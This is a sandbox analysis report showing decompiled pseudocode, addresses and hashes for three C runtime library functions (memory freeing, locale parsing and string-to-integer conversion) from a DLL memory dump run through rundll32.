Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction ID: b907945a8bb2440a8cb3aef72e6a2d2f21cc4e48b824f8509c024221972a3f23
Opcode Fuzzy Hash: 5da5c4793209c74a93b238e7f3eb4125497ecebd09cd7aca8a72de3c159ab4d2
Instruction Fuzzy Hash: 50F01236100566BFDB126F91CC48A893F65EF092A1F014015FF08D6130C6318860DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10011DD7, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011DD7() {

				E100268B3( *0x1004e850);
				 *0x1004e850 = 0;
				E100268B3( *0x1004e854);
				 *0x1004e854 = 0;
				E100268B3( *0x1004e538);
				 *0x1004e538 = 0;
				E100268B3( *0x1004e53c);
				 *0x1004e53c = 0;
				return 1;
			}

0x10011de0
0x10011ded
0x10011df3
0x10011dfe
0x10011e04
0x10011e0f
0x10011e15
0x10011e1d
0x10011e26

APIs

_free.LIBCMT ref: 10011DE0

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 10011DF3
_free.LIBCMT ref: 10011E04
_free.LIBCMT ref: 10011E15

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction ID: b92291fbf5b9387dec10b5d829ed7a1edaa60bcb681d517941d5f30f05375802
Opcode Fuzzy Hash: 07ee624c573888530ac5761be1d19be9513cbb8fe5f39405c8f430c56bec78f2
Instruction Fuzzy Hash: FBE0B6798199B0ABFB02AF54FFC14493BA1E74A758345015EFC08D2231DF351E629F99

Uniqueness

Uniqueness Score: -1.00%

Function 100250E8, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E100250E8(signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				intOrPtr _v20;
				char _v180;
				short _v202;
				short _v204;
				short _v206;
				signed short _v208;
				signed short _v210;
				signed short _v212;
				char _v468;
				signed int* _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				signed int _v492;
				signed int _v496;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t101;
				signed short _t102;
				signed short _t104;
				signed int _t106;
				void* _t109;
				signed int _t110;
				signed int _t114;
				intOrPtr _t119;
				signed int _t127;
				signed int _t129;
				signed short _t133;
				signed int _t135;
				char* _t136;
				signed int _t137;
				intOrPtr _t140;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				signed int* _t153;
				void* _t154;
				signed int* _t160;
				void* _t162;
				void* _t164;
				intOrPtr* _t176;
				signed int _t177;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr* _t185;
				signed int* _t189;
				signed int _t191;
				intOrPtr _t192;
				signed int* _t193;
				signed int _t195;
				void* _t196;
				signed int* _t197;
				signed int _t198;
				signed int _t199;
				void* _t200;

				_t191 = __edx;
				_t83 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t83 ^ _t199;
				_t149 = _a8;
				_t197 = _a4;
				_v488 = _a24;
				_t86 = 0;
				_v496 = _t149;
				_t192 = _a16;
				if(_t197 == 0) {
					L70:
					return E100037EA(_t86, _v8 ^ _t199, _t191);
				} else {
					_v484 = 0;
					if( *_t197 != 0x43 || _t197[0] != 0) {
						_t89 = E10023FB6(_t154, _t191) + 0x50;
						_t13 = _t89 + 0x18; // -56
						_v472 = _t13;
						_t15 = _t89 + 0x122; // 0xd2
						_t150 = _t15;
						_t16 = _t89 + 0x1c; // -52
						_v476 = _t150;
						_v480 = _t16;
						E100249B6(_t150,  &_v512, _t192, _t192, _a20, E10023FB6(_t154, _t191) + 0x50);
						_t193 = _t197;
						_t191 = 0;
						__eflags = 0;
						_t160 =  &(_t193[0]);
						do {
							_t91 =  *_t193;
							_t193 =  &(_t193[0]);
							__eflags = _t91;
						} while (_t91 != 0);
						_t195 = _t193 - _t160 >> 1;
						_v492 = _t195;
						__eflags = _t195 - 0x83;
						if(_t195 >= 0x83) {
							L24:
							_t92 = E1002A5FE();
							__eflags = _t92;
							_t152 = 0 | _t92 == 0x00000000;
							_t94 = E10024EA3(_t152, _t160, _t191, _t195,  &_v468, _t197);
							_pop(_t162);
							__eflags = _t94;
							if(_t94 != 0) {
								_t153 = _v472;
								goto L33;
							} else {
								_t136 =  &_v468;
								__eflags = _t152;
								_t153 = _v472;
								_push(_t136);
								_push(_t153);
								_push(_t136);
								if(__eflags == 0) {
									_t137 = E100303BF(_t162, _t191, __eflags);
								} else {
									_t137 = E10030D3E(_t162, _t191, __eflags);
								}
								_t200 = _t200 + 0xc;
								__eflags = _t137;
								if(_t137 == 0) {
									L33:
									_t95 = E1002A35B(_t197);
									_push(_t197);
									__eflags = _t95;
									if(_t95 == 0) {
										_push( &_v468);
										_t97 = E1002605B();
										_pop(_t164);
										__eflags = _t97;
										if(_t97 == 0) {
											L67:
											__eflags = 0;
											_t149 = 0;
											goto L68;
										} else {
											_t101 = E1002A35B( &_v180);
											__eflags = _t101;
											if(_t101 == 0) {
												goto L67;
											} else {
												_t102 = _v212;
												__eflags = _t102;
												if(_t102 == 0) {
													_t104 = E1002602C(_t164,  &_v180);
													goto L55;
												} else {
													_t182 = _t102 & 0x0000ffff;
													__eflags = _t182 - 0x41 - 0x19;
													if(_t182 - 0x41 <= 0x19) {
														_t182 = _t182 + 0x20;
														__eflags = _t182;
													}
													_t191 = 0x38;
													__eflags = _t182 - 0x75;
													if(_t182 != 0x75) {
														L50:
														__eflags = _v206 - 0x2d;
														if(_v206 != 0x2d) {
															goto L67;
														} else {
															__eflags = _v204 - _t191;
															if(_v204 != _t191) {
																goto L67;
															} else {
																__eflags = _v202;
																if(_v202 != 0) {
																	goto L67;
																} else {
																	goto L53;
																}
															}
														}
													} else {
														_t183 = _v210 & 0x0000ffff;
														__eflags = _t183 - 0x41 - 0x19;
														if(_t183 - 0x41 <= 0x19) {
															_t183 = _t183 + 0x20;
															__eflags = _t183;
														}
														__eflags = _t183 - 0x74;
														if(_t183 != 0x74) {
															goto L50;
														} else {
															_t184 = _v208 & 0x0000ffff;
															__eflags = _t184 - 0x41 - 0x19;
															if(_t184 - 0x41 <= 0x19) {
																_t184 = _t184 + 0x20;
																__eflags = _t184;
															}
															__eflags = _t184 - 0x66;
															if(_t184 != 0x66) {
																goto L50;
															} else {
																__eflags = _v206 - _t191;
																if(_v206 != _t191) {
																	goto L50;
																} else {
																	__eflags = _v204;
																	if(_v204 == 0) {
																		L53:
																		_t104 = 0xfde9;
																		L55:
																		_t196 = _t195 + 1;
																		_push(_t196);
																		 *_t153 = _t104 & 0x0000ffff;
																		_t149 = _v476;
																		_t106 = E1002FBCB(_t149, 0x83, _t197);
																		_t200 = _t200 + 0x10;
																		__eflags = _t106;
																		if(_t106 != 0) {
																			goto L71;
																		} else {
																			_t176 =  &_v180;
																			_t191 = _t176 + 2;
																			do {
																				_t119 =  *_t176;
																				_t176 = _t176 + 2;
																				__eflags = _t119 - _v484;
																			} while (_t119 != _v484);
																			_t177 = _t176 - _t191;
																			__eflags = _t177;
																			_push((_t177 >> 1) + 1);
																			_push( &_v180);
																			goto L59;
																		}
																	} else {
																		goto L50;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t133 = E1002602C(_t162);
										_t196 = _t195 + 1;
										_push(_t196);
										 *_t153 = _t133 & 0x0000ffff;
										_t149 = _v476;
										_t135 = E1002FBCB(_t149, 0x83, _t197);
										_t200 = _t200 + 0x14;
										__eflags = _t135;
										if(_t135 != 0) {
											goto L71;
										} else {
											_push(_t196);
											_push(_t197);
											L59:
											E10024C94( &_v512, _t197);
											goto L60;
										}
									}
								} else {
									_t149 = _v476;
									_push( &_v468);
									E10024E33(_t149, _t162, _t191, _t195, _t149, 0x83);
									_t185 =  &_v180;
									_t200 = _t200 + 0xc;
									_t191 = _t185 + 2;
									do {
										_t140 =  *_t185;
										_t185 = _t185 + 2;
										__eflags = _t140 - _v484;
									} while (_t140 != _v484);
									E10024CD8( &_v512, _t197,  &_v180, (_t185 - _t191 >> 1) + 1);
									_t196 = _t195 + 1;
									L60:
									__eflags =  *_t197;
									if( *_t197 == 0) {
										L64:
										__eflags = 0;
										 *_v480 = 0;
										goto L65;
									} else {
										__eflags = _v492 - 0x83;
										if(_v492 >= 0x83) {
											goto L64;
										} else {
											_push(_t196);
											_t129 = E1002FBCB(_v480, 0x83, _t197);
											_t200 = _t200 + 0x10;
											__eflags = _t129;
											if(_t129 == 0) {
												goto L65;
											} else {
												goto L71;
											}
										}
									}
								}
							}
						} else {
							_t189 = _t197;
							_t144 = _t150;
							while(1) {
								_t191 =  *_t144;
								__eflags = _t191 -  *_t189;
								if(_t191 !=  *_t189) {
									break;
								}
								__eflags = _t191;
								if(_t191 == 0) {
									L13:
									_t145 = 0;
								} else {
									_t191 =  *((intOrPtr*)(_t144 + 2));
									__eflags = _t191 - _t189[0];
									if(_t191 != _t189[0]) {
										break;
									} else {
										_t144 = _t144 + 4;
										_t189 =  &(_t189[1]);
										__eflags = _t191;
										if(_t191 != 0) {
											continue;
										} else {
											goto L13;
										}
									}
								}
								L15:
								__eflags = _t145;
								if(_t145 == 0) {
									L65:
									 *_v488 =  *_v472;
									_t127 = E10028A30(_v496, _a12, _t149);
									__eflags = _t127;
									if(_t127 != 0) {
										goto L71;
									} else {
										L68:
										E10024A36( &_v512);
										goto L69;
									}
								} else {
									_t146 = _v480;
									_t160 = _t197;
									while(1) {
										_t191 =  *_t146;
										__eflags = _t191 -  *_t160;
										if(_t191 !=  *_t160) {
											break;
										}
										__eflags = _t191;
										if(_t191 == 0) {
											L21:
											_t147 = 0;
										} else {
											_t191 =  *((intOrPtr*)(_t146 + 2));
											__eflags = _t191 - _t160[0];
											if(_t191 != _t160[0]) {
												break;
											} else {
												_t146 = _t146 + 4;
												_t160 =  &(_t160[1]);
												__eflags = _t191;
												if(_t191 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
										L23:
										__eflags = _t147;
										if(_t147 == 0) {
											goto L65;
										} else {
											goto L24;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t147 = _t146 | 0x00000001;
									__eflags = _t147;
									goto L23;
								}
								goto L84;
							}
							asm("sbb eax, eax");
							_t145 = _t144 | 0x00000001;
							__eflags = _t145;
							goto L15;
						}
					} else {
						_t148 = E10028A30(_t149, _a12, 0x10044e50);
						if(_t148 != 0) {
							L71:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E1000E341();
							asm("int3");
							_push(8);
							_push(0x1004b2f8);
							_t109 = E100040F0();
							_t198 = _a4;
							__eflags = _t198;
							if(_t198 != 0) {
								_t110 = E1002651E(5);
								_v8 = _v8 & 0x00000000;
								__eflags =  *(_t198 + 4);
								if( *(_t198 + 4) != 0) {
									__eflags = _t110 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if((_t110 | 0xffffffff) == 0) {
										__eflags =  *(_t198 + 4) - 0x1004d180;
										if( *(_t198 + 4) != 0x1004d180) {
											E100268B3( *(_t198 + 4));
										}
									}
								}
								_v8 = 0xfffffffe;
								E1002555B();
								__eflags =  *_t198;
								if( *_t198 != 0) {
									E1002651E(4);
									_v8 = 1;
									E1002E33E( *_t198);
									_t114 =  *_t198;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags =  *(_t114 + 0xc);
										if( *(_t114 + 0xc) == 0) {
											__eflags = _t114 - 0x1004d0b8;
											if(_t114 != 0x1004d0b8) {
												E1002E173(_t114);
											}
										}
									}
									_v8 = 0xfffffffe;
									E10025567();
								}
								_t109 = E100268B3(_t198);
							}
							 *[fs:0x0] = _v20;
							return _t109;
						} else {
							 *_v488 = _t148;
							L69:
							_t86 = _t149;
							goto L70;
						}
					}
				}
				L84:
			}

0x100250e8
0x100250f3
0x100250fa
0x10025101
0x10025105
0x10025108
0x1002510e
0x10025110
0x10025117
0x1002511c
0x10025492
0x100254a0
0x10025122
0x10025126
0x1002512c
0x1002515f
0x10025166
0x10025169
0x1002516f
0x1002516f
0x10025175
0x10025178
0x1002517e
0x1002518b
0x10025190
0x10025192
0x10025192
0x10025194
0x10025197
0x10025197
0x1002519a
0x1002519d
0x1002519d
0x100251a4
0x100251a6
0x100251ac
0x100251b2
0x10025226
0x10025226
0x1002522d
0x10025237
0x1002523a
0x10025240
0x10025241
0x10025243
0x100252be
0x00000000
0x10025245
0x10025245
0x1002524b
0x1002524d
0x10025253
0x10025254
0x10025255
0x10025256
0x1002525f
0x10025258
0x10025258
0x10025258
0x10025264
0x10025267
0x10025269
0x100252c4
0x100252c5
0x100252ca
0x100252cb
0x100252cd
0x10025305
0x10025306
0x1002530c
0x1002530d
0x1002530f
0x10025481
0x10025481
0x10025483
0x00000000
0x10025315
0x1002531c
0x10025321
0x10025323
0x00000000
0x10025329
0x10025329
0x10025330
0x10025333
0x100253c7
0x00000000
0x10025339
0x10025339
0x1002533f
0x10025342
0x10025344
0x10025344
0x10025344
0x10025349
0x1002534a
0x1002534d
0x10025390
0x10025390
0x10025398
0x00000000
0x1002539e
0x1002539e
0x100253a5
0x00000000
0x100253ab
0x100253ab
0x100253b3
0x00000000
0x00000000
0x00000000
0x00000000
0x100253b3
0x100253a5
0x1002534f
0x1002534f
0x10025359
0x1002535c
0x1002535e
0x1002535e
0x1002535e
0x10025361
0x10025364
0x00000000
0x10025366
0x10025366
0x10025370
0x10025373
0x10025375
0x10025375
0x10025375
0x10025378
0x1002537b
0x00000000
0x1002537d
0x1002537d
0x10025384
0x00000000
0x10025386
0x10025386
0x1002538e
0x100253b9
0x100253b9
0x100253cd
0x100253cd
0x100253d1
0x100253d3
0x100253d5
0x100253e1
0x100253e6
0x100253e9
0x100253eb
0x00000000
0x100253f1
0x100253f1
0x100253f7
0x100253fa
0x100253fa
0x100253fd
0x10025400
0x10025400
0x10025409
0x10025409
0x10025410
0x10025417
0x00000000
0x10025417
0x00000000
0x00000000
0x00000000
0x1002538e
0x10025384
0x1002537b
0x10025364
0x1002534d
0x10025333
0x10025323
0x100252cf
0x100252cf
0x100252d4
0x100252d8
0x100252da
0x100252dc
0x100252e8
0x100252ed
0x100252f0
0x100252f2
0x00000000
0x100252f8
0x100252f8
0x100252f9
0x10025418
0x1002541e
0x00000000
0x1002541e
0x100252f2
0x1002526b
0x1002526b
0x10025277
0x1002527e
0x10025283
0x10025289
0x1002528c
0x1002528f
0x1002528f
0x10025292
0x10025295
0x10025295
0x100252b3
0x100252b8
0x10025423
0x10025425
0x10025428
0x1002544e
0x10025454
0x10025456
0x00000000
0x1002542a
0x1002542f
0x10025435
0x00000000
0x10025437
0x10025437
0x10025440
0x10025445
0x10025448
0x1002544a
0x00000000
0x1002544c
0x00000000
0x1002544c
0x1002544a
0x10025435
0x10025428
0x10025269
0x100251b4
0x100251b4
0x100251b6
0x100251b8
0x100251b8
0x100251bb
0x100251be
0x00000000
0x00000000
0x100251c0
0x100251c3
0x100251da
0x100251da
0x100251c5
0x100251c5
0x100251c9
0x100251cd
0x00000000
0x100251cf
0x100251cf
0x100251d2
0x100251d5
0x100251d8
0x00000000
0x00000000
0x00000000
0x00000000
0x100251d8
0x100251cd
0x100251e3
0x100251e3
0x100251e5
0x10025459
0x10025471
0x10025473
0x1002547b
0x1002547d
0x00000000
0x1002547f
0x10025485
0x1002548b
0x00000000
0x1002548b
0x100251eb
0x100251eb
0x100251f1
0x100251f3
0x100251f3
0x100251f6
0x100251f9
0x00000000
0x00000000
0x100251fb
0x100251fe
0x10025215
0x10025215
0x10025200
0x10025200
0x10025204
0x10025208
0x00000000
0x1002520a
0x1002520a
0x1002520d
0x10025210
0x10025213
0x00000000
0x00000000
0x00000000
0x00000000
0x10025213
0x10025208
0x1002521e
0x1002521e
0x10025220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10025220
0x10025219
0x1002521b
0x1002521b
0x00000000
0x1002521b
0x00000000
0x100251e5
0x100251de
0x100251e0
0x100251e0
0x00000000
0x100251e0
0x10025134
0x1002513d
0x10025147
0x100254a1
0x100254a3
0x100254a4
0x100254a5
0x100254a6
0x100254a7
0x100254a8
0x100254ad
0x100254ae
0x100254b0
0x100254b5
0x100254ba
0x100254bd
0x100254bf
0x100254c7
0x100254cd
0x100254d4
0x100254d6
0x100254d8
0x100254db
0x100254df
0x100254e1
0x100254e8
0x100254ed
0x100254f2
0x100254e8
0x100254df
0x100254f3
0x100254fa
0x100254ff
0x10025502
0x10025506
0x1002550c
0x10025515
0x1002551b
0x1002551d
0x1002551f
0x10025521
0x10025525
0x10025527
0x1002552c
0x1002552f
0x10025534
0x1002552c
0x10025525
0x10025535
0x1002553c
0x1002553c
0x10025542
0x10025547
0x1002554b
0x10025557
0x1002514d
0x10025153
0x10025490
0x10025490
0x00000000
0x10025490
0x10025147
0x1002512c
0x00000000

APIs

_free.LIBCMT ref: 100254ED
_free.LIBCMT ref: 10025542

Strings

-, xrefs: 10025390

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction ID: 66f1abc88b353573048c8297ce13dc3db2c99bd53dfa5fdd719ba2a4e5362786
Opcode Fuzzy Hash: 182027e96e950bcb7a76d4b4b57f72c40b47ad3f81e16720650cf2bf331a3730
Instruction Fuzzy Hash: 16C109759002569BDB20DF64EC51BEEB3F4EF05386F9140AAE80697181EB72AFC4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000ED39, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000ED39(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed char _v5;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v60;
				char _v64;
				intOrPtr* _t82;
				signed int _t84;
				signed int _t86;
				signed int _t90;
				signed int _t91;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed char _t100;
				signed int _t102;
				signed int _t103;
				signed char _t114;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				signed int _t128;
				signed char _t129;
				signed char _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				if(E1000FB3F( &_a8) == 0) {
					L5:
					_t128 = 0;
					_t150 = 0;
					L6:
					_t82 = _a12;
					if(_t82 != 0) {
						 *_t82 = _a8;
					}
					return _t128;
				}
				_t84 = _a16;
				if(_t84 == 0) {
					L9:
					E1000F794( &_v64, _t144, _a4);
					_t86 = _a8;
					_t149 = 0;
					_v20 = 0;
					_t150 = 0;
					_v48 = _t86;
					L11:
					_t129 =  *_t86;
					_a8 = _t86 + 1;
					_v16 = _t129;
					_v5 = _t129;
					_t90 = E1000FEA3(_t129 & 0x000000ff, 8,  &_v60);
					_t151 = _t151 + 0xc;
					__eflags = _t90;
					if(_t90 != 0) {
						_t86 = _a8;
						goto L11;
					}
					_t91 = _a20 & 0x000000ff;
					_v12 = _t91;
					__eflags = _t129 - 0x2d;
					if(_t129 != 0x2d) {
						__eflags = _t129 - 0x2b;
						if(_t129 != 0x2b) {
							_t146 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v12 = _t91 | 0x00000002;
						L15:
						_t147 = _a8;
						_t129 =  *_t147;
						_t146 = _t147 + 1;
						_v5 = _t129;
						_v16 = _t129;
						_a8 = _t146;
						L17:
						_t135 = _a16;
						__eflags = _t135;
						if(_t135 == 0) {
							L19:
							__eflags = _t129 - 0x30 - 9;
							if(_t129 - 0x30 > 9) {
								__eflags = _t129 - 0x61 - 0x19;
								if(_t129 - 0x61 > 0x19) {
									_t97 = _t129 - 0x41;
									__eflags = _t97 - 0x19;
									if(_t97 > 0x19) {
										_t98 = _t97 | 0xffffffff;
										__eflags = _t98;
									} else {
										_t98 = _t129 + 0xffffffc9;
									}
								} else {
									_t98 = _t129 + 0xffffffa9;
								}
							} else {
								_t98 = _t129 + 0xffffffd0;
							}
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 =  *_t146;
								_t146 = _t146 + 1;
								_v28 = _t99;
								_a8 = _t146;
								__eflags = _t99 - 0x78;
								if(_t99 == 0x78) {
									L35:
									__eflags = _t135;
									if(_t135 == 0) {
										_a16 = 0x10;
									}
									_t100 =  *_t146;
									_v5 = _t100;
									_v16 = _t100;
									_a8 = _t146 + 1;
									L34:
									_t102 = _a16;
									L39:
									asm("cdq");
									_push(_t129);
									_t136 = _t146;
									_v44 = _t102;
									_v40 = _t136;
									_t103 = E1003F7B0(0xffffffff, 0xffffffff, _t102, _t136);
									_v32 = _t129;
									_t131 = _v12;
									_v36 = _t136;
									_t137 = _v5;
									_v24 = _t103;
									_v28 = _t146;
									while(1) {
										__eflags = _t137 - 0x30 - 9;
										if(_t137 - 0x30 > 9) {
											__eflags = _t137 - 0x61 - 0x19;
											if(_t137 - 0x61 > 0x19) {
												__eflags = _t137 - 0x41 - 0x19;
												if(_t137 - 0x41 > 0x19) {
													_t138 = _t137 | 0xffffffff;
													__eflags = _t138;
												} else {
													_t138 = _t137 + 0xffffffc9;
												}
											} else {
												_t138 = _t137 + 0xffffffa9;
											}
										} else {
											_t138 = _t137 + 0xffffffd0;
										}
										_v12 = _t138;
										__eflags = _t138 - 0xffffffff;
										if(_t138 == 0xffffffff) {
											break;
										}
										__eflags = _t138 - _a16;
										if(_t138 >= _a16) {
											break;
										}
										_t116 = _v20;
										_t131 = _t131 | 0x00000008;
										__eflags = _t150 - _t146;
										if(__eflags < 0) {
											L58:
											_v12 = _t138;
											L59:
											_t117 = E1003F850(_v44, _v40, _t116, _t150);
											_t150 = _t146;
											_v20 = _t117 + _v12;
											asm("adc esi, edi");
											L60:
											_t119 = _a8;
											_t146 = _v28;
											_t137 =  *_t119;
											_v16 = _t137;
											_a8 = _t119 + 1;
											continue;
										}
										_t146 = _v24;
										if(__eflags > 0) {
											L52:
											__eflags = _t116 - _t146;
											if(_t116 != _t146) {
												L57:
												_t131 = _t131 | 0x00000004;
												goto L60;
											}
											__eflags = _t150 - _v28;
											if(_t150 != _v28) {
												goto L57;
											}
											__eflags = _t149 - _v32;
											if(__eflags < 0) {
												goto L59;
											}
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t138 - _v36;
											if(_t138 <= _v36) {
												goto L59;
											}
											goto L57;
										}
										__eflags = _t116 - _t146;
										if(_t116 < _t146) {
											goto L58;
										}
										goto L52;
									}
									_v12 = _t131;
									E1000FAE8( &_a8, _v16);
									__eflags = _t131 & 0x00000008;
									if((_t131 & 0x00000008) != 0) {
										_t128 = _v20;
										__eflags = E1000E497(_v12, _t128, _t150);
										if(__eflags == 0) {
											__eflags = _v12 & 0x00000002;
											if((_v12 & 0x00000002) != 0) {
												_t128 =  ~_t128;
												asm("adc esi, edi");
												_t150 =  ~_t150;
											}
											L72:
											__eflags = _v52;
											if(_v52 != 0) {
												 *(_v64 + 0x350) =  *(_v64 + 0x350) & 0xfffffffd;
											}
											goto L6;
										}
										 *((intOrPtr*)(E1002449E(__eflags))) = 0x22;
										_t114 = _v12;
										__eflags = _t114 & 0x00000001;
										if((_t114 & 0x00000001) != 0) {
											__eflags = _t114 & 0x00000002;
											if((_t114 & 0x00000002) == 0) {
												_t149 = _t149 | 0xffffffff;
												__eflags = _t149;
												_t150 = 0x7fffffff;
											} else {
												_t150 = 0x80000000;
											}
											L69:
											_t128 = _t149;
											goto L72;
										}
										_t128 = _t128 | 0xffffffff;
										_t150 = _t150 | 0xffffffff;
										goto L72;
									}
									_t150 = _t149;
									_a8 = _v48;
									goto L69;
								}
								__eflags = _t99 - 0x58;
								if(_t99 == 0x58) {
									goto L35;
								}
								__eflags = _t135;
								if(_t135 == 0) {
									_a16 = 8;
								}
								E1000FAE8( &_a8, _v28);
								goto L34;
							}
							__eflags = _t135;
							if(_t135 != 0) {
								L38:
								_t102 = _t135;
								goto L39;
							}
							_t102 = 0xa;
							_a16 = _t102;
							goto L39;
						}
						__eflags = _t135 - 0x10;
						if(_t135 != 0x10) {
							goto L38;
						}
						goto L19;
					}
				}
				if(_t84 < 2) {
					L4:
					 *((intOrPtr*)(E1002449E(_t156))) = 0x16;
					E1000E314();
					goto L5;
				}
				_t156 = _t84 - 0x24;
				if(_t84 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x1000ed4e
0x1000ed71
0x1000ed73
0x1000ed75
0x1000ed77
0x1000ed77
0x1000ed7c
0x1000ed81
0x1000ed81
0x1000ed8b
0x1000ed8b
0x1000ed50
0x1000ed55
0x1000ed8c
0x1000ed92
0x1000ed97
0x1000ed9a
0x1000ed9c
0x1000ed9f
0x1000eda1
0x1000eda9
0x1000eda9
0x1000edac
0x1000edb9
0x1000edbc
0x1000edbf
0x1000edc4
0x1000edc7
0x1000edc9
0x1000eda6
0x00000000
0x1000eda6
0x1000edcb
0x1000edcf
0x1000edd2
0x1000edd5
0x1000eddf
0x1000ede2
0x1000edf5
0x00000000
0x1000edf5
0x00000000
0x1000edd7
0x1000edda
0x1000ede4
0x1000ede4
0x1000ede7
0x1000ede9
0x1000edea
0x1000eded
0x1000edf0
0x1000edf8
0x1000edf8
0x1000edfb
0x1000edfd
0x1000ee08
0x1000ee0c
0x1000ee0e
0x1000ee1c
0x1000ee1e
0x1000ee2a
0x1000ee2c
0x1000ee2e
0x1000ee38
0x1000ee38
0x1000ee30
0x1000ee33
0x1000ee33
0x1000ee20
0x1000ee23
0x1000ee23
0x1000ee10
0x1000ee13
0x1000ee13
0x1000ee3b
0x1000ee3d
0x1000ee4b
0x1000ee4d
0x1000ee4e
0x1000ee51
0x1000ee54
0x1000ee56
0x1000ee77
0x1000ee77
0x1000ee79
0x1000ee7b
0x1000ee7b
0x1000ee82
0x1000ee84
0x1000ee87
0x1000ee8d
0x1000ee72
0x1000ee72
0x1000ee94
0x1000ee94
0x1000ee95
0x1000ee96
0x1000ee98
0x1000eea1
0x1000eea4
0x1000eea9
0x1000eeae
0x1000eeb1
0x1000eeb4
0x1000eeb7
0x1000eeba
0x1000eebd
0x1000eec1
0x1000eec3
0x1000eed1
0x1000eed3
0x1000eee1
0x1000eee3
0x1000eeed
0x1000eeed
0x1000eee5
0x1000eee8
0x1000eee8
0x1000eed5
0x1000eed8
0x1000eed8
0x1000eec5
0x1000eec8
0x1000eec8
0x1000eef0
0x1000eef3
0x1000eef6
0x00000000
0x00000000
0x1000eef8
0x1000eefb
0x00000000
0x00000000
0x1000eefd
0x1000ef00
0x1000ef03
0x1000ef05
0x1000ef2a
0x1000ef2a
0x1000ef2d
0x1000ef35
0x1000ef3d
0x1000ef3f
0x1000ef42
0x1000ef44
0x1000ef44
0x1000ef47
0x1000ef4a
0x1000ef4d
0x1000ef50
0x00000000
0x1000ef50
0x1000ef07
0x1000ef0a
0x1000ef10
0x1000ef10
0x1000ef12
0x1000ef25
0x1000ef25
0x00000000
0x1000ef25
0x1000ef14
0x1000ef17
0x00000000
0x00000000
0x1000ef19
0x1000ef1c
0x00000000
0x00000000
0x1000ef1e
0x00000000
0x00000000
0x1000ef20
